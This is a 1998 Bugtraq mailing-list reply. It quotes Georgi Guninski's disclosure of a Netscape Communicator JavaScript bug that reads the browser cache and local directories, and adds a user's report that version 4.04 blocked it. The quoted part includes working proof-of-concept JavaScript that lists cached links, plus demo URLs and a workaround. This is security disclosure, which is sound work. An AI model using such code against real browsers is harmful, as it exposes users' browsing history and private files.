[8351] in bugtraq
Re: Javascript bug in Netscape Communicator 4.5
daemon@ATHENA.MIT.EDU (Ian Guthrie)
Fri Oct 30 16:34:40 1998
Date: Wed, 28 Oct 1998 18:33:40 -0600
Reply-To: iguthrie@swbell.net
From: Ian Guthrie <iguthrie@SWBELL.NET>
X-To: Georgi Guninski <guninski@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
FYI: I run Netscape 4.04 and this is what I got trying that link:
JavaScript Error: file:/c|/, line 2:
access disallowed from scripts at
http://www.geocities.com/ResearchTriangle/1711/b5.html to documents at
another domain.
Ian
Georgi Guninski wrote:
> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95
> (probably others) which allows reading user's cache (the urls the user
> has
> visited, including the info in GET forms). Reading local directories
> content
> is also allowed. This info may be sent to an arbitrary host.
> The bug may be exploited by email.
>
> Demonstration is available at:
> Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html
> Directory reading:
> http://www.geocities.com/ResearchTriangle/1711/b5.html
>
> The javascript code is:
>
> sl=window.open('wysiwyg://1/about:cache');
> //For Netscape 3.04 remove 'wysiwyg://1/'
> sl2=sl.window.open();
> sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here
> are some links from your cache:\"; for(i=0;i<5;i++)
> x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
> sl2.location.reload();
>
> Workaround: Disable Javascript.
>
> Regards,
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711/
>
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
